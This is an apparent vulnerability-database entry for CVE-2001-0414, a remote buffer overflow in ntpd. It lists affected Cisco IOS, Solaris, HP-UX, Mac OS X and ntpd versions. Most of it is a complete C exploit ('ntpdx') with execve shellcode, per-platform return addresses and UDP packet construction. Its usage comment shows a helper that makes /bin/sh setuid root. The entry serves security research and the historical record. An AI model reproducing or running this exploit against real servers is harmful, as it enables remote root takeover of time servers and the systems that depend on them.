ID
VAR-E-200104-0050
CVE
| cve_id: | CVE-2001-0414 | Trust: 2.4 |
EDB ID
20727
TITLE
NTPd - Remote Buffer Overflow - Linux remote Exploit
Trust: 0.6
DESCRIPTION
NTPd - Remote Buffer Overflow. CVE-2001-0414CVE-805 . remote exploit for Linux platform
Trust: 0.6
AFFECTED PRODUCTS
| vendor: | ntpd | model: | - | scope: | - | version: | - | Trust: 1.5 |
| vendor: | cisco | model: | ios 12.0 w5 | scope: | - | version: | - | Trust: 0.9 |
| vendor: | cisco | model: | ios 12.2xq | scope: | - | version: | - | Trust: 0.6 |
| vendor: | cisco | model: | ios 12.0 xk | scope: | - | version: | - | Trust: 0.6 |
| vendor: | sun | model: | solaris 8 x86 | scope: | - | version: | - | Trust: 0.3 |
| vendor: | sun | model: | solaris 8 sparc | scope: | - | version: | - | Trust: 0.3 |
| vendor: | sun | model: | solaris 7.0 x86 | scope: | - | version: | - | Trust: 0.3 |
| vendor: | sun | model: | solaris | scope: | eq | version: | 7.0 | Trust: 0.3 |
| vendor: | sun | model: | solaris 2.6 x86 | scope: | - | version: | - | Trust: 0.3 |
| vendor: | sun | model: | solaris | scope: | eq | version: | 2.6 | Trust: 0.3 |
| vendor: | hp | model: | hp-ux | scope: | eq | version: | 11.0.4 | Trust: 0.3 |
| vendor: | hp | model: | hp-ux | scope: | eq | version: | 10.24 | Trust: 0.3 |
| vendor: | hp | model: | hp-ux | scope: | eq | version: | 11.11 | Trust: 0.3 |
| vendor: | hp | model: | hp-ux | scope: | eq | version: | 11.0 | Trust: 0.3 |
| vendor: | hp | model: | hp-ux | scope: | eq | version: | 10.20 | Trust: 0.3 |
| vendor: | hp | model: | hp-ux | scope: | eq | version: | 10.10 | Trust: 0.3 |
| vendor: | hp | model: | hp-ux | scope: | eq | version: | 10.01 | Trust: 0.3 |
| vendor: | dave | model: | mills xntp3 e | scope: | eq | version: | 5.93 | Trust: 0.3 |
| vendor: | dave | model: | mills xntp3 d | scope: | eq | version: | 5.93 | Trust: 0.3 |
| vendor: | dave | model: | mills xntp3 c | scope: | eq | version: | 5.93 | Trust: 0.3 |
| vendor: | dave | model: | mills xntp3 b | scope: | eq | version: | 5.93 | Trust: 0.3 |
| vendor: | dave | model: | mills xntp3 a | scope: | eq | version: | 5.93 | Trust: 0.3 |
| vendor: | dave | model: | mills xntp3 | scope: | eq | version: | 5.93 | Trust: 0.3 |
| vendor: | dave | model: | mills ntpd k | scope: | eq | version: | 4.0.99 | Trust: 0.3 |
| vendor: | dave | model: | mills ntpd j | scope: | eq | version: | 4.0.99 | Trust: 0.3 |
| vendor: | dave | model: | mills ntpd i | scope: | eq | version: | 4.0.99 | Trust: 0.3 |
| vendor: | dave | model: | mills ntpd h | scope: | eq | version: | 4.0.99 | Trust: 0.3 |
| vendor: | dave | model: | mills ntpd g | scope: | eq | version: | 4.0.99 | Trust: 0.3 |
| vendor: | dave | model: | mills ntpd f | scope: | eq | version: | 4.0.99 | Trust: 0.3 |
| vendor: | dave | model: | mills ntpd e | scope: | eq | version: | 4.0.99 | Trust: 0.3 |
| vendor: | dave | model: | mills ntpd d | scope: | eq | version: | 4.0.99 | Trust: 0.3 |
| vendor: | dave | model: | mills ntpd c | scope: | eq | version: | 4.0.99 | Trust: 0.3 |
| vendor: | dave | model: | mills ntpd b | scope: | eq | version: | 4.0.99 | Trust: 0.3 |
| vendor: | dave | model: | mills ntpd a | scope: | eq | version: | 4.0.99 | Trust: 0.3 |
| vendor: | dave | model: | mills ntpd | scope: | eq | version: | 4.0.99 | Trust: 0.3 |
| vendor: | cisco | model: | voice services provisioning tool | scope: | - | version: | - | Trust: 0.3 |
| vendor: | cisco | model: | virtual switch controller | scope: | eq | version: | 3000 | Trust: 0.3 |
| vendor: | cisco | model: | sc2200 | scope: | - | version: | - | Trust: 0.3 |
| vendor: | cisco | model: | pgw2200 pstn gateway | scope: | - | version: | - | Trust: 0.3 |
| vendor: | cisco | model: | ip manager | scope: | eq | version: | 2.0 | Trust: 0.3 |
| vendor: | cisco | model: | ip manager | scope: | eq | version: | 1.0 | Trust: 0.3 |
| vendor: | cisco | model: | ios 12.2yc | scope: | - | version: | - | Trust: 0.3 |
| vendor: | cisco | model: | ios 12.2ya | scope: | - | version: | - | Trust: 0.3 |
| vendor: | cisco | model: | ios 12.2xh | scope: | - | version: | - | Trust: 0.3 |
| vendor: | cisco | model: | ios 12.2xe | scope: | - | version: | - | Trust: 0.3 |
| vendor: | cisco | model: | ios 12.2xd | scope: | - | version: | - | Trust: 0.3 |
| vendor: | cisco | model: | ios 12.2xb | scope: | - | version: | - | Trust: 0.3 |
| vendor: | cisco | model: | ios 12.2xa | scope: | - | version: | - | Trust: 0.3 |
| vendor: | cisco | model: | ios 12.2t | scope: | - | version: | - | Trust: 0.3 |
| vendor: | cisco | model: | ios 12.2s | scope: | - | version: | - | Trust: 0.3 |
| vendor: | cisco | model: | ios 12.2pi | scope: | - | version: | - | Trust: 0.3 |
| vendor: | cisco | model: | ios 12.2pb | scope: | - | version: | - | Trust: 0.3 |
| vendor: | cisco | model: | ios 12.2da | scope: | - | version: | - | Trust: 0.3 |
| vendor: | cisco | model: | ios 12.2bx | scope: | - | version: | - | Trust: 0.3 |
| vendor: | cisco | model: | ios 12.2bw | scope: | - | version: | - | Trust: 0.3 |
| vendor: | cisco | model: | ios 12.2b | scope: | - | version: | - | Trust: 0.3 |
| vendor: | cisco | model: | ios | scope: | eq | version: | 12.2 | Trust: 0.3 |
| vendor: | cisco | model: | ios 12.1yf | scope: | - | version: | - | Trust: 0.3 |
| vendor: | cisco | model: | ios 12.1yd | scope: | - | version: | - | Trust: 0.3 |
| vendor: | cisco | model: | ios 12.1yc | scope: | - | version: | - | Trust: 0.3 |
| vendor: | cisco | model: | ios 12.1yb | scope: | - | version: | - | Trust: 0.3 |
| vendor: | cisco | model: | ios 12.1ya | scope: | - | version: | - | Trust: 0.3 |
| vendor: | cisco | model: | ios 12.1xz | scope: | - | version: | - | Trust: 0.3 |
| vendor: | cisco | model: | ios 12.1xy | scope: | - | version: | - | Trust: 0.3 |
| vendor: | cisco | model: | ios | scope: | eq | version: | 12.1xx | Trust: 0.3 |
| vendor: | cisco | model: | ios 12.1xw | scope: | - | version: | - | Trust: 0.3 |
| vendor: | cisco | model: | ios | scope: | eq | version: | 12.1xv | Trust: 0.3 |
| vendor: | cisco | model: | ios 12.1xu | scope: | - | version: | - | Trust: 0.3 |
| vendor: | cisco | model: | ios 12.1xt | scope: | - | version: | - | Trust: 0.3 |
| vendor: | cisco | model: | ios 12.1xs | scope: | - | version: | - | Trust: 0.3 |
| vendor: | cisco | model: | ios 12.1xr | scope: | - | version: | - | Trust: 0.3 |
| vendor: | cisco | model: | ios 12.1xq | scope: | - | version: | - | Trust: 0.3 |
| vendor: | cisco | model: | ios 12.1xp | scope: | - | version: | - | Trust: 0.3 |
| vendor: | cisco | model: | ios 12.1xm | scope: | - | version: | - | Trust: 0.3 |
| vendor: | cisco | model: | ios 12.1xl | scope: | - | version: | - | Trust: 0.3 |
| vendor: | cisco | model: | ios 12.1xk | scope: | - | version: | - | Trust: 0.3 |
| vendor: | cisco | model: | ios 12.1xj | scope: | - | version: | - | Trust: 0.3 |
| vendor: | cisco | model: | ios 12.1xi | scope: | - | version: | - | Trust: 0.3 |
| vendor: | cisco | model: | ios 12.1xh | scope: | - | version: | - | Trust: 0.3 |
| vendor: | cisco | model: | ios 12.1xg | scope: | - | version: | - | Trust: 0.3 |
| vendor: | cisco | model: | ios 12.1xf | scope: | - | version: | - | Trust: 0.3 |
| vendor: | cisco | model: | ios 12.1xe | scope: | - | version: | - | Trust: 0.3 |
| vendor: | cisco | model: | ios 12.1xd | scope: | - | version: | - | Trust: 0.3 |
| vendor: | cisco | model: | ios 12.1xc | scope: | - | version: | - | Trust: 0.3 |
| vendor: | cisco | model: | ios 12.1xb | scope: | - | version: | - | Trust: 0.3 |
| vendor: | cisco | model: | ios 12.1xa | scope: | - | version: | - | Trust: 0.3 |
| vendor: | cisco | model: | ios 12.1t | scope: | - | version: | - | Trust: 0.3 |
| vendor: | cisco | model: | ios 12.1ez | scope: | - | version: | - | Trust: 0.3 |
| vendor: | cisco | model: | ios 12.1ey | scope: | - | version: | - | Trust: 0.3 |
| vendor: | cisco | model: | ios 12.1ex | scope: | - | version: | - | Trust: 0.3 |
| vendor: | cisco | model: | ios 12.1ec | scope: | - | version: | - | Trust: 0.3 |
| vendor: | cisco | model: | ios 12.1e | scope: | - | version: | - | Trust: 0.3 |
| vendor: | cisco | model: | ios 12.1dc | scope: | - | version: | - | Trust: 0.3 |
| vendor: | cisco | model: | ios 12.1db | scope: | - | version: | - | Trust: 0.3 |
| vendor: | cisco | model: | ios 12.1da | scope: | - | version: | - | Trust: 0.3 |
| vendor: | cisco | model: | ios 12.1cx | scope: | - | version: | - | Trust: 0.3 |
| vendor: | cisco | model: | ios 12.1aa | scope: | - | version: | - | Trust: 0.3 |
| vendor: | cisco | model: | ios | scope: | eq | version: | 12.1 | Trust: 0.3 |
| vendor: | cisco | model: | ios | scope: | eq | version: | 12.0xv | Trust: 0.3 |
| vendor: | cisco | model: | ios 12.0xu | scope: | - | version: | - | Trust: 0.3 |
| vendor: | cisco | model: | ios 12.0xs | scope: | - | version: | - | Trust: 0.3 |
| vendor: | cisco | model: | ios 12.0xr | scope: | - | version: | - | Trust: 0.3 |
| vendor: | cisco | model: | ios 12.0xq | scope: | - | version: | - | Trust: 0.3 |
| vendor: | cisco | model: | ios 12.0xp | scope: | - | version: | - | Trust: 0.3 |
| vendor: | cisco | model: | ios 12.0xn | scope: | - | version: | - | Trust: 0.3 |
| vendor: | cisco | model: | ios 12.0xm | scope: | - | version: | - | Trust: 0.3 |
| vendor: | cisco | model: | ios 12.0xl | scope: | - | version: | - | Trust: 0.3 |
| vendor: | cisco | model: | ios 12.0xj | scope: | - | version: | - | Trust: 0.3 |
| vendor: | cisco | model: | ios 12.0xi | scope: | - | version: | - | Trust: 0.3 |
| vendor: | cisco | model: | ios 12.0xh | scope: | - | version: | - | Trust: 0.3 |
| vendor: | cisco | model: | ios 12.0xg | scope: | - | version: | - | Trust: 0.3 |
| vendor: | cisco | model: | ios 12.0xf | scope: | - | version: | - | Trust: 0.3 |
| vendor: | cisco | model: | ios 12.0xe | scope: | - | version: | - | Trust: 0.3 |
| vendor: | cisco | model: | ios 12.0xd | scope: | - | version: | - | Trust: 0.3 |
| vendor: | cisco | model: | ios 12.0xc | scope: | - | version: | - | Trust: 0.3 |
| vendor: | cisco | model: | ios 12.0xb | scope: | - | version: | - | Trust: 0.3 |
| vendor: | cisco | model: | ios 12.0xa | scope: | - | version: | - | Trust: 0.3 |
| vendor: | cisco | model: | ios 12.0wt | scope: | - | version: | - | Trust: 0.3 |
| vendor: | cisco | model: | ios 12.0wc | scope: | - | version: | - | Trust: 0.3 |
| vendor: | cisco | model: | ios 12.0t | scope: | - | version: | - | Trust: 0.3 |
| vendor: | cisco | model: | ios 12.0st | scope: | - | version: | - | Trust: 0.3 |
| vendor: | cisco | model: | ios 12.0sl | scope: | - | version: | - | Trust: 0.3 |
| vendor: | cisco | model: | ios 12.0sc | scope: | - | version: | - | Trust: 0.3 |
| vendor: | cisco | model: | ios 12.0s | scope: | - | version: | - | Trust: 0.3 |
| vendor: | cisco | model: | ios 12.0dc | scope: | - | version: | - | Trust: 0.3 |
| vendor: | cisco | model: | ios 12.0db | scope: | - | version: | - | Trust: 0.3 |
| vendor: | cisco | model: | ios 12.0da | scope: | - | version: | - | Trust: 0.3 |
| vendor: | cisco | model: | ios | scope: | eq | version: | 12.0 | Trust: 0.3 |
| vendor: | cisco | model: | ios 11.3xa | scope: | - | version: | - | Trust: 0.3 |
| vendor: | cisco | model: | ios 11.3wa4 | scope: | - | version: | - | Trust: 0.3 |
| vendor: | cisco | model: | ios 11.3t | scope: | - | version: | - | Trust: 0.3 |
| vendor: | cisco | model: | ios 11.3na | scope: | - | version: | - | Trust: 0.3 |
| vendor: | cisco | model: | ios 11.3ma | scope: | - | version: | - | Trust: 0.3 |
| vendor: | cisco | model: | ios 11.3ha | scope: | - | version: | - | Trust: 0.3 |
| vendor: | cisco | model: | ios 11.3db | scope: | - | version: | - | Trust: 0.3 |
| vendor: | cisco | model: | ios 11.3da | scope: | - | version: | - | Trust: 0.3 |
| vendor: | cisco | model: | ios 11.3aa | scope: | - | version: | - | Trust: 0.3 |
| vendor: | cisco | model: | ios | scope: | eq | version: | 11.3 | Trust: 0.3 |
| vendor: | cisco | model: | ios 11.2xa | scope: | - | version: | - | Trust: 0.3 |
| vendor: | cisco | model: | ios 11.2wa4 | scope: | - | version: | - | Trust: 0.3 |
| vendor: | cisco | model: | ios 11.2sa | scope: | - | version: | - | Trust: 0.3 |
| vendor: | cisco | model: | ios 11.2p | scope: | - | version: | - | Trust: 0.3 |
| vendor: | cisco | model: | ios 11.2gs | scope: | - | version: | - | Trust: 0.3 |
| vendor: | cisco | model: | ios 11.2f | scope: | - | version: | - | Trust: 0.3 |
| vendor: | cisco | model: | ios 11.2bc | scope: | - | version: | - | Trust: 0.3 |
| vendor: | cisco | model: | ios | scope: | eq | version: | 11.2 | Trust: 0.3 |
| vendor: | cisco | model: | ios 11.1ia | scope: | - | version: | - | Trust: 0.3 |
| vendor: | cisco | model: | ios 11.1ct | scope: | - | version: | - | Trust: 0.3 |
| vendor: | cisco | model: | ios 11.1cc | scope: | - | version: | - | Trust: 0.3 |
| vendor: | cisco | model: | ios 11.1ca | scope: | - | version: | - | Trust: 0.3 |
| vendor: | cisco | model: | ios 11.1aa | scope: | - | version: | - | Trust: 0.3 |
| vendor: | cisco | model: | ios | scope: | eq | version: | 11.1 | Trust: 0.3 |
| vendor: | cisco | model: | ios | scope: | eq | version: | 11.0 | Trust: 0.3 |
| vendor: | cisco | model: | ios | scope: | eq | version: | 10.3 | Trust: 0.3 |
| vendor: | cisco | model: | bts | scope: | eq | version: | 10200 | Trust: 0.3 |
| vendor: | cisco | model: | billing and management server | scope: | - | version: | - | Trust: 0.3 |
| vendor: | apple | model: | mac os | scope: | eq | version: | x10.0.1 | Trust: 0.3 |
| vendor: | apple | model: | mac os | scope: | eq | version: | x10.0 | Trust: 0.3 |
| vendor: | cisco | model: | ios 12.2dd | scope: | ne | version: | - | Trust: 0.3 |
| vendor: | cisco | model: | ios 12.2 t | scope: | ne | version: | - | Trust: 0.3 |
| vendor: | cisco | model: | ios | scope: | ne | version: | 12.2(4) | Trust: 0.3 |
| vendor: | cisco | model: | ios 12.2 bp | scope: | ne | version: | - | Trust: 0.3 |
| vendor: | cisco | model: | ios | scope: | ne | version: | 12.2(3) | Trust: 0.3 |
| vendor: | cisco | model: | ios 12.2 xa1 | scope: | ne | version: | - | Trust: 0.3 |
| vendor: | cisco | model: | ios 12.2 xa | scope: | ne | version: | - | Trust: 0.3 |
| vendor: | cisco | model: | ios 12.2 b | scope: | ne | version: | - | Trust: 0.3 |
| vendor: | cisco | model: | ios 12.2 | scope: | ne | version: | - | Trust: 0.3 |
| vendor: | cisco | model: | ios 12.2 s | scope: | ne | version: | - | Trust: 0.3 |
| vendor: | cisco | model: | ios 12.2 pi | scope: | ne | version: | - | Trust: 0.3 |
| vendor: | cisco | model: | ios 12.2 xq | scope: | ne | version: | - | Trust: 0.3 |
| vendor: | cisco | model: | ios 12.2 xh | scope: | ne | version: | - | Trust: 0.3 |
| vendor: | cisco | model: | ios 12.2 xe | scope: | ne | version: | - | Trust: 0.3 |
| vendor: | cisco | model: | ios 12.2 xd1 | scope: | ne | version: | - | Trust: 0.3 |
| vendor: | cisco | model: | ios 12.1 aa | scope: | ne | version: | - | Trust: 0.3 |
| vendor: | cisco | model: | ios | scope: | ne | version: | 12.1(9) | Trust: 0.3 |
| vendor: | cisco | model: | ios 12.1 e | scope: | ne | version: | - | Trust: 0.3 |
| vendor: | cisco | model: | ios 12.1 ec | scope: | ne | version: | - | Trust: 0.3 |
| vendor: | cisco | model: | ios 12.1 cx | scope: | ne | version: | - | Trust: 0.3 |
| vendor: | cisco | model: | ios 12.1 ez2 | scope: | ne | version: | - | Trust: 0.3 |
| vendor: | cisco | model: | ios 12.1 ey | scope: | ne | version: | - | Trust: 0.3 |
| vendor: | cisco | model: | ios 12.1 yf2 | scope: | ne | version: | - | Trust: 0.3 |
| vendor: | cisco | model: | ios 12.1 yd2 | scope: | ne | version: | - | Trust: 0.3 |
| vendor: | cisco | model: | ios 12.1 yc1 | scope: | ne | version: | - | Trust: 0.3 |
| vendor: | cisco | model: | ios 12.1 yb4 | scope: | ne | version: | - | Trust: 0.3 |
| vendor: | cisco | model: | ios | scope: | ne | version: | 12.1(5)xv3 | Trust: 0.3 |
| vendor: | cisco | model: | ios 12.1 xs2 | scope: | ne | version: | - | Trust: 0.3 |
| vendor: | cisco | model: | ios 12.1 xm4 | scope: | ne | version: | - | Trust: 0.3 |
| vendor: | cisco | model: | ios 12.1 t9 | scope: | ne | version: | - | Trust: 0.3 |
| vendor: | cisco | model: | ios 12.1 xf4 | scope: | ne | version: | - | Trust: 0.3 |
| vendor: | cisco | model: | ios 12.0wc | scope: | ne | version: | - | Trust: 0.3 |
| vendor: | cisco | model: | ios 12.0 yb4 | scope: | ne | version: | - | Trust: 0.3 |
| vendor: | cisco | model: | ios 12.0 wc2 | scope: | ne | version: | - | Trust: 0.3 |
| vendor: | cisco | model: | ios 12.0 st1 | scope: | ne | version: | - | Trust: 0.3 |
| vendor: | cisco | model: | ios 12.0 sl2 | scope: | ne | version: | - | Trust: 0.3 |
| vendor: | apple | model: | mac os | scope: | ne | version: | x10.0.2 | Trust: 0.3 |
EXPLOIT
// source: https://www.securityfocus.com/bid/2540/info
NTP, the Network Time Protocol, is used to synchronize the time between a computer and another system or time reference. It uses UDP as a transport protocol. There are two protocol versions in use: NTP v3 and NTP v4. The 'ntpd' daemon implementing version 3 is called 'xntp3'; the version implementing version 4 is called 'ntp'.
On UNIX systems, the 'ntpd' daemon is available to regularly synchronize system time with internet time servers.
Many versions of 'ntpd' are prone to a remotely exploitable buffer-overflow issue. A remote attacker may be able to crash the daemon or execute arbitrary code on the host.
If successful, the attacker may gain root access on the victim host or may denial NTP service on the affected host.
/* ntpd remote root exploit / babcia padlina ltd. <venglin@freebsd.lublin.pl> */
/*
* Network Time Protocol Daemon (ntpd) shipped with many systems is vulnerable
* to remote buffer overflow attack. It occurs when building response for
* a query with large readvar argument. In almost all cases, ntpd is running
* with superuser privileges, allowing to gain REMOTE ROOT ACCESS to timeserver.
*
* Althought it's a normal buffer overflow, exploiting it is much harder.
* Destination buffer is accidentally damaged, when attack is performed, so
* shellcode can't be larger than approx. 70 bytes. This proof of concept code
* uses small execve() shellcode to run /tmp/sh binary. Full remote attack
* is possible.
*
* NTP is stateless UDP based protocol, so all malicious queries can be
* spoofed.
*
* Example of use on generic RedHat 7.0 box:
*
* [venglin@cipsko venglin]$ cat dupa.c
* main() { setreuid(0,0); system("chmod 4755 /bin/sh"); }
* [venglin@cipsko venglin]$ cc -o /tmp/sh dupa.c
* [venglin@cipsko venglin]$ cc -o ntpdx ntpdx.c
* [venglin@cipsko venglin]$ ./ntpdx -t2 localhost
* ntpdx v1.0 by venglin@freebsd.lublin.pl
*
* Selected platform: RedHat Linux 7.0 with ntpd 4.0.99k-RPM (/tmp/sh)
*
* RET: 0xbffff777 / Align: 240 / Sh-align: 160 / sending query
* [1] <- evil query (pkt = 512 | shell = 45)
* [2] <- null query (pkt = 12)
* Done.
* /tmp/sh was spawned.
* [venglin@cipsko venglin]$ ls -al /bin/bash
* -rwsr-xr-x 1 root root 512540 Aug 22 2000 /bin/bash
*
*/
#include <stdio.h>
#include <stdlib.h>
#include <stdarg.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#include <unistd.h>
#include <arpa/inet.h>
#define NOP 0x90
#define ADDRS 8
#define PKTSIZ 512
static char usage[] = "usage: ntpdx [-o offset] <-t type> <hostname>";
/* generic execve() shellcodes */
char lin_execve[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/tmp/sh";
char bsd_execve[] =
"\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f"
"\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52"
"\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/tmp/sh\x01\x01\x01\x01"
"\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04";
struct platforms
{
char *os;
char *version;
char *code;
long ret;
int align;
int shalign;
int port;
};
/* Platforms. Notice, that on FreeBSD shellcode must be placed in packet
* *after* RET address. This values will vary from platform to platform.
*/
struct platforms targ[] =
{
{ "FreeBSD 4.2-STABLE", "4.0.99k (/tmp/sh)", bsd_execve,
0xbfbff8bc, 200, 220, 0 },
{ "FreeBSD 4.2-STABLE", "4.0.99k (/tmp/sh)", bsd_execve,
0xbfbff540, 200, 220, 0 },
{ "RedHat Linux 7.0", "4.0.99k-RPM (/tmp/sh)", lin_execve,
0xbffff777, 240, 160, 0 },
{ NULL, NULL, NULL, 0x0, 0, 0, 0 }
};
long getip(name)
char *name;
{
struct hostent *hp;
long ip;
extern int h_errno;
if ((ip = inet_addr(name)) < 0)
{
if (!(hp = gethostbyname(name)))
{
fprintf(stderr, "gethostbyname(): %s\n",
strerror(h_errno));
exit(1);
}
memcpy(&ip, (hp->h_addr), 4);
}
return ip;
}
int doquery(host, ret, shellcode, align, shalign)
char *host, *shellcode;
long ret;
int align, shalign;
{
/* tcpdump-based reverse engineering :)) */
char q2[] = { 0x16, 0x02, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x01, 0x36, 0x73, 0x74, 0x72, 0x61,
0x74, 0x75, 0x6d, 0x3d };
char q3[] = { 0x16, 0x02, 0x00, 0x02, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00 };
char buf[PKTSIZ], *p;
long *ap;
int i;
int sockfd;
struct sockaddr_in sa;
bzero(&sa, sizeof(sa));
sa.sin_family = AF_INET;
sa.sin_port = htons(123);
sa.sin_addr.s_addr = getip(host);
if((sockfd = socket(AF_INET, SOCK_DGRAM, 0)) < 0)
{
perror("socket");
return -1;
}
if((connect(sockfd, (struct sockaddr *)&sa, sizeof(sa))) < 0)
{
perror("connect");
close(sockfd);
return -1;
}
memset(buf, NOP, PKTSIZ);
memcpy(buf, q2, sizeof(q2));
p = buf + align;
ap = (unsigned long *)p;
for(i=0;i<ADDRS/4;i++)
*ap++ = ret;
p = (char *)ap;
memcpy(buf+shalign, shellcode, strlen(shellcode));
if((write(sockfd, buf, PKTSIZ)) < 0)
{
perror("write");
close(sockfd);
return -1;
}
fprintf(stderr, "[1] <- evil query (pkt = %d | shell = %d)\n", PKTSIZ,
strlen(shellcode));
fflush(stderr);
if ((write(sockfd, q3, sizeof(q3))) < 0)
{
perror("write");
close(sockfd);
return -1;
}
fprintf(stderr, "[2] <- null query (pkt = %d)\n", sizeof(q3));
fflush(stderr);
close(sockfd);
return 0;
}
int main(argc, argv)
int argc;
char **argv;
{
extern int optind, opterr;
extern char *optarg;
int ch, type, ofs, i;
long ret;
opterr = ofs = 0;
type = -1;
while ((ch = getopt(argc, argv, "t:o:")) != -1)
switch((char)ch)
{
case 't':
type = atoi(optarg);
break;
case 'o':
ofs = atoi(optarg);
break;
case '?':
default:
puts(usage);
exit(0);
}
argc -= optind;
argv += optind;
fprintf(stderr, "ntpdx v1.0 by venglin@freebsd.lublin.pl\n\n");
if (type < 0)
{
fprintf(stderr, "Please select platform:\n");
for (i=0;targ[i].os;i++)
{
fprintf(stderr, "\t-t %d : %s %s (%p)\n", i,
targ[i].os, targ[i].version, (void *)targ[i].ret);
}
exit(0);
}
fprintf(stderr, "Selected platform: %s with ntpd %s\n\n",
targ[type].os, targ[type].version);
ret = targ[type].ret;
ret += ofs;
if (argc != 1)
{
puts(usage);
exit(0);
}
fprintf(stderr, "RET: %p / Align: %d / Sh-align: %d / sending query\n",
(void *)ret, targ[type].align, targ[type].shalign);
if (doquery(*argv, ret, targ[type].code, targ[type].align,
targ[type].shalign) < 0)
{
fprintf(stderr, "Failed.\n");
exit(1);
}
fprintf(stderr, "Done.\n");
if (!targ[type].port)
{
fprintf(stderr, "/tmp/sh was spawned.\n");
exit(0);
}
exit(0);
}
Trust: 1.0
EXPLOIT LANGUAGE
c
Trust: 0.6
PRICE
free
Trust: 0.6
TYPE
Remote Buffer Overflow
Trust: 1.0
TAGS
| tag: | exploit | Trust: 0.5 |
| tag: | overflow | Trust: 0.5 |
CREDITS
babcia padlina ltd
Trust: 0.6
EXTERNAL IDS
| db: | NVD | id: | CVE-2001-0414 | Trust: 2.4 |
| db: | EXPLOIT-DB | id: | 20727 | Trust: 1.9 |
| db: | BID | id: | 2540 | Trust: 1.9 |
| db: | EDBNET | id: | 42860 | Trust: 0.6 |
| db: | CERT/CC | id: | VU#970472 | Trust: 0.5 |
| db: | PACKETSTORM | id: | 82268 | Trust: 0.5 |
REFERENCES
| url: | https://nvd.nist.gov/vuln/detail/cve-2001-0414 | Trust: 2.1 |
| url: | https://www.securityfocus.com/bid/2540/info | Trust: 1.0 |
| url: | https://www.exploit-db.com/exploits/20727/ | Trust: 0.6 |
| url: | http://www.cisco.com/warp/public/707/ntp-pub.shtml | Trust: 0.3 |
| url: | http://support.coresecurity.com/impact/exploits/1d0617f506101c3c4db122dc40236f69.html | Trust: 0.3 |
| url: | https://www.exploit-db.com/exploits/20727 | Trust: 0.3 |
| url: | http://www.ntp.org | Trust: 0.3 |
SOURCES
| db: | BID | id: | 2540 |
| db: | PACKETSTORM | id: | 82268 |
| db: | EXPLOIT-DB | id: | 20727 |
| db: | EDBNET | id: | 42860 |
LAST UPDATE DATE
2022-07-27T09:21:00.633000+00:00
SOURCES UPDATE DATE
| db: | BID | id: | 2540 | date: | 2007-11-05T17:05:00 |
SOURCES RELEASE DATE
| db: | BID | id: | 2540 | date: | 2001-04-04T00:00:00 |
| db: | PACKETSTORM | id: | 82268 | date: | 2009-10-27T21:30:47 |
| db: | EXPLOIT-DB | id: | 20727 | date: | 2001-04-04T00:00:00 |
| db: | EDBNET | id: | 42860 | date: | 2001-04-04T00:00:00 |